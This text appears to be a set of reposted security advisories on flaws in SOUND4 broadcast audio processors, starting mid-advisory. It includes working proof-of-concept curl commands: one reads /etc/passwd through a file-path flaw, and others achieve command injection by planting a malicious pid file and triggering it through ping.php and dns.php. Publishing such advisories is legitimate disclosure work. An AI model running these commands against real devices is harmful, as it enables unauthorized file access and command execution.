GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5736Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php26.09.2022--> curl -k "https://RADIOGAGA/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd" | python -m json.tool{    "size": 519,    "data": [        "root:x:0:0:root:/root:/bin/sh",        "daemon:x:1:1:daemon:/usr/sbin:/bin/false",        "bin:x:2:2:bin:/bin:/bin/false",        "sys:x:3:3:sys:/dev:/bin/false",        "sync:x:4:100:sync:/bin:/bin/sync",        "mail:x:8:8:mail:/var/spool/mail:/bin/false",        "www-data:x:33:33:www-data:/var/www:/bin/false",        "operator:x:37:37:Operator:/var:/bin/false",        "nobody:x:99:99:nobody:/home:/bin/false",        "sound4:x:1000:1000::/home/sound4:/bin/sh",        "avahi:x:1001:1001::/:/bin/false",        "dbus:x:1002:1002:DBus messagebus user:/var/run/dbus:/bin/false",        "sshd:x:1003:1004:SSH drop priv user:/:/bin/false"    ]}

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Unauthenticated File Disclosure

SOUND4 IMPACT/FIRST/PULSE/Eco version 2.x and below suffer from a conditional command injection vulnerability in ping.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .ping.pid, and the commands in thefile can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/ping.php:------------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['ping_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".ping.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5735Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5735.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.ping.pid#External> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=r00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x ping.php Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated radio stream disclosure vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Radio Stream DisclosureVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated live stream disclosurewhen webplay or ffmpeg scripts are called.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5734Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5734.php26.09.2022--1. https://RADIO/webplay/mp3/1282. https://RADIO/cgi-bin/ffmpeg.cgi?codec=mp3&bitrate=128

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Radio Steam Disclosure

SOUND4 IMPACT/FIRST/PULSE/Eco version 2.x and below suffer from a conditional command injection vulnerability in dns.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (dns.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .dns.pid, and the commands in thefile can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/dns.php:-----------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['dns_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".dns.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5733Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5733.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.dns.pid#External> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=m00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

Source

Packet Storm